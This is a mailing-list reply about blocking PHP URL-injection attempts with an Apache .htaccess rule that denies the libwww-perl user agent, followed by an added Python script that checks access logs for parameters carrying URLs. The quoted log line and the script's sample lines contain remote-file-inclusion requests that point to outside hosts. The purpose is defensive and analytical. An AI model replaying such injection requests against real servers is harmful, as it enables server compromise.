Hello, Johan, you (johan.sundstrom) wrote on 03.12.07:

> IP Address of attacker: xxx.yyy.zzz.zzz
> Type of attack: URL Injection -- attempt to inject / load files onto
> the server via PHP/CGI vulnerabilities
> Sample log report including date and time stamp:
> Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - -
> [01/Dec/2007:16:59:21 -0800] "GET
> /logos/banners//index.php?skin_file=http://www.n0n-clan.net//vwar/convert/test.txt?
> HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"

I stop these nasty scripts with an entry in the ".htaccess" file in the
Apache "DocumentRoot":

    BrowserMatchNoCase "^libwww-perl" botnet
    order allow,deny
    allow from all
    deny from env=botnet

You can choose a name other than "botnet", and you can add other
definitions for this self-defined environment variable.
The "order/allow/deny" block first allows "all" and then blocks all
defined requests.

Without this entry the tries result in error level 404 (or 500) in
"error_log". With this entry they produce error level 403.

I have tried this entry on a website with about 2000 visits a day; over a
month there was no "good" try with the browser "libwww-perl". Only nasty
scripts.

Best regards!
Helmut

_______________________________________________
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users
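
Added example (not part of Helmut's message or of rkhunter): a Python check that replays access-log lines in the format quoted above and reports, per request, whether the "^libwww-perl" rule would have matched and whether any query parameter carries a URL as its value, so the rule's coverage of URL-injection attempts can be measured from existing logs. The function names, the REMOTE_URL pattern and the sample lines are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qsl

# Access-log line: optional vhost, client, ident, user, [time], "request", status, size, "referer", "agent"
LINE = re.compile(
    r'^(?:(?P<vhost>\S+) )?(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
AGENT_RULE = re.compile(r'^libwww-perl', re.I)        # same pattern as the BrowserMatchNoCase entry
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)  # assumed heuristic: parameter value is a URL

def classify(line):
    """Parse one log line and return two independent verdicts, or None if unparsable."""
    m = LINE.match(line)
    if m is None:
        return None
    query = m['target'].partition('?')[2]
    remote = [k for k, v in parse_qsl(query, keep_blank_values=True) if REMOTE_URL.match(v)]
    return {
        'client': m['client'],
        'status': int(m['status']),
        'matched_by_rule': bool(AGENT_RULE.match(m['agent'])),  # would get 403 with the entry
        'remote_url_params': remote,                            # parameters holding a URL
    }

def coverage(lines):
    """Count URL-in-parameter requests and how many of them the User-Agent rule matches."""
    rows = [r for r in map(classify, lines) if r is not None]
    flagged = [r for r in rows if r['remote_url_params']]
    return {
        'rule_matches_total': sum(r['matched_by_rule'] for r in rows),
        'remote_url_requests': len(flagged),
        'remote_url_matched_by_rule': sum(r['matched_by_rule'] for r in flagged),
    }

# Constructed sample lines (documentation addresses and example hosts, not real traffic)
SAMPLE = [
    'shop.example 192.0.2.10 - - [01/Dec/2007:16:59:21 -0800] "GET /logos/banners//index.php?skin_file=http://remote.example/convert/test.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"',
    '198.51.100.7 - - [01/Dec/2007:17:02:03 -0800] "GET /index.php?skin_file=http://remote.example/a.txt HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    'shop.example 203.0.113.5 - - [01/Dec/2007:17:05:40 -0800] "GET /catalog.php?page=2&sort=price HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'shop.example 192.0.2.44 - - [01/Dec/2007:17:09:12 -0800] "GET /robots.txt HTTP/1.0" 200 68 "-" "LIBWWW-PERL/5.79"',
]

if __name__ == '__main__':
    for entry in SAMPLE:
        print(classify(entry))
    print(coverage(SAMPLE))
```

Requests counted in remote_url_requests but not in remote_url_matched_by_rule are the ones the ".htaccess" entry leaves to the application, which is where a per-parameter check has to catch them.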